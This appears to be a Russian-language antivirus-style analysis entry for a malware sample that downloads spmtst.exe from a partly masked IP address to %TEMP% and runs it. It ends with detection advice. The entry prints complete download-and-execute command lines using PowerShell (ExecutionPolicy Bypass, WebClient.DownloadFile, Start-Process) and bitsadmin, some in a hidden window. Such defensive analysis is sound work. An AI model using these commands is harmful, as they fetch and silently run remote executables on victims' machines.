Техническая информация
- Загружает http://21#.#.117.10/spmtst.exe и сохраняет как %temp%\585993.exe
- http://21#.#.117.10/spmtst.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://21#.#.117.10/spmtst.exe','%TEMP%\585993.exe');Start-Process '%TEMP%\585993.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer windows /download /priority high http://21#.#.117.10/spmtst.exe %TEMP%\6494949.exe&start %TEMP%\6494949.exe (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://21#.#.117.10/spmtst.exe','%TEMP%\585993.exe');Start-Process '%TEMP%\585993.exe'
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer windows /download /priority high http://21#.#.117.10/spmtst.exe %TEMP%\6494949.exe&start %TEMP%\6494949.exe
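- '<SYSTEM32>\bitsadmin.exe' /transfer windows /download /priority high http://21#.#.117.10/spmtst.exe %TEMP%\6494949.exe
Примечание: строки выше показывают два независимых способа загрузки одного и того же файла (PowerShell WebClient.DownloadFile и bitsadmin /transfer) с последующим запуском из %TEMP%; для обнаружения стоит отслеживать запуск cmd.exe с такими командными строками и появление новых исполняемых файлов в %TEMP%.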